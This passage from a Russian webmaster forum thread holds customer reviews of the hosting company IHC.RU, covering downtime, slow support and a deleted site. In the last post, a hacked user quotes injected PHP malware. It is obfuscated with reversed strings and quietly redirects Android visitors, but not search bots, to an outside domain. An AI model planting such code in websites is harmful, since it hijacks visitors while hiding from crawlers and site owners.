IHC.RU - Качественный хостинг, VPS, сервера в надёжных ДЦ без переплаты. Скидки!

МК
На сайте с 26.05.2013
Offline
41
#591

Петухов Виктор, там есть адрес руководителя. На форуме вас нельзя однозначно индетифицировать поэтому не все данные можно сообщать. Обратитесь в ТП или (если они вам чем то не угодили) к руководителю по электронной почте вам все расскажут. Вас ткнули носом в нарушение. А подробности на форумах расписывать никто не обязан.

Рекомендую: Хостинг, VDS, сервера (https://goo.gl/WFzeMG) в Москве за очень разумные цены.
[Удален]
#592
RUPak:
Вы в техподдержку писали? Что они вам ответили?

Т.е., когда, например, школьник с панелью разобраться не может,пишет сюда, все норм.

А я почему то обязан писать именно в ТП, а тут не имею право, штоль, бро?

И чего вы все привязались с этой ТП??? Один тролль вбросил и пошли наперегонки строчить, здесь только положительные отзывы можно постить, я что то не всосу

Ilya74
На сайте с 12.06.2008
Offline
353
#593
Петухов Виктор:
Т.е., когда, например, школьник с панелью разобраться не может,пишет сюда, все норм.
А я почему то обязан писать именно в ТП, а тут не имею право, штоль, бро?
И чего вы все привязались с этой ТП??? Один тролль вбросил и пошли наперегонки строчить, здесь только положительные отзывы можно постить, я что то не всосу

Вопросы про панель - это скорее консультации, на такие вопросы можно ответить где угодно.

Обсуждение причин блокировки/удаления/содержимого Вашего VPS - совсем другое дело и, на мой взгляд, руководство компании правильно делает, что не выдаёт эту информацию на публику.

Если Вам реально важны подробности, давно бы уже написали в поддержку и всё выяснили.

А отзывы строчить никто не запрещает, строчите, если Вам есть о чём сказать. Но вот обсуждать ли конкретно Вашу проблему здесь или нет - выбор хостера.

⚡️ Хостинг и VPS в Москве, Новосибирске, Нидерландах, США ( https://x5x.host )
P1
На сайте с 23.11.2009
Offline
45
#594

Хостинг стал просто ужас. Очередь на перезагрузку сервера длится более 30 минут, соответственно сайты в дауне. Постоянно (примерно 3 раза в день) происходит беспричинное зависание сайтов, причем не в пики нагрузки. Тариф:Юпитер. Хотя еще год назад был отличный хостинг.

Стабильный доход уже более 2х лет (https://advmaker.net/webmaster/ref/2567970/f172dd8e1cc712d8f81cb4b024cfba78/)
Andy_Kaufman
На сайте с 01.07.2014
Offline
22
#595
pingons1983:
Хостинг стал просто ужас. Очередь на перезагрузку сервера длится более 30 минут, соответственно сайты в дауне. Постоянно (примерно 3 раза в день) происходит беспричинное зависание сайтов, причем не в пики нагрузки. Тариф:Юпитер. Хотя еще год назад был отличный хостинг.

А что говорит тех. поддержка?

P1
На сайте с 23.11.2009
Offline
45
#596
Andy_Kaufman:
А что говорит тех. поддержка?

Вначале писали что очередь на перезагрузку, через минут 10 я повторил вопрос, сказали что уже перезагрузился, но не было доступа по ssh и всего остального. Я опять написал, через минут 10 ответили, что проблема с сервером и они уже занимаются. Через минут 10 заработало. Сегодня ситуация еще хуже, сайты больше лежат, чем работают. Правда перезагрузка стала происходить быстрее (значительно). В общем готовлю площадку и ухожу от них. Очень жалко более 1,5 лет с ними.

---------- Добавлено 07.05.2015 в 18:47 ----------

Сейчас опять не перезагружается сервер, поддержка вновь ссылается на проблемы с сервером и они уже занимаются. А мне что делать? Сайты весь день больше лежат, чем работают. В общем ужас полный!

Idonat
На сайте с 24.06.2012
Offline
141
#597

Отвратительный и ужасный хостинг. Кто то начал DDoSить мой сайт а хостер просто взял и забанил мой заказ сразу удалив сайт, без каких либо предупреждений и оповещений. Я не могу попасть ни в панель управления, ни по FTP, возможности получить бекап сайта нет (Вы же не заказывали услугу бекапа ©).

На правах экспертного сообщества SearchEngines ©
66
На сайте с 13.10.2013
Offline
53
#598

Потдерживаю, контора оставляет желать лучшего. Опыт общения с администраторами печален и безрезультатен.

P
На сайте с 21.04.2008
Offline
251
#599
6o6aH:
Потдерживаю, контора оставляет желать лучшего. Опыт общения с администраторами печален и безрезультатен.

На какую тему общались?

Интернет Хостинг Центр IHC.RU - Хостинг, KVM VPS на SSD, аренда серверов.
sas7110
На сайте с 22.05.2009
Offline
111
#600

Пользуюсь хостингом пару лет, проблем не было. Суппорт работает отлично. Но есть проблема, которая реально бесит очень сильно. На 1 аккаунте несколько сайтов, панель ihc. Когда ломают один сайт, то вредоносный код закидывают по всем сайтам, это просто УЖАСНО! Можно же дать звиздюлей своим програмерам, чтобы сделали разделение сайтов. Чтобы придурки взламывая сайт могли только на нем лазить и не было доступа к другим сайтам на аккаунте! А то как ломанут, начинай искать где и что изменили, куда шелл залили и так далее. Это очень проблематично лечить сайты и дорого.

Сделайте пожалуйста разделение сайтов!

Вот такой код нашел:

$gant = strtolower($_SERVER[strrev(strtoupper('tnega_resu_ptth'))]);$ref = $_SERVER[strrev(strtoupper('tsoh_ptth'))];

if(!preg_match('/crawl|andex|oogle|bot/i',$gant)) {

if((preg_match('/ndroi|htc_|htc-/i',$gant)) and (!isset ($_COOKIE['dle_user_id'])) and($_SERVER['REQUEST_URI'] != '/'))

{header(strrev('=REREFER_PTTH&1=ru&lmth.41'.'/67namyrros/'.'stneilc'.'/cc.'.'slm'.'thx'.'//:pt'.'th :noi'.'tac'.'oL').$ref);exit;}}

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий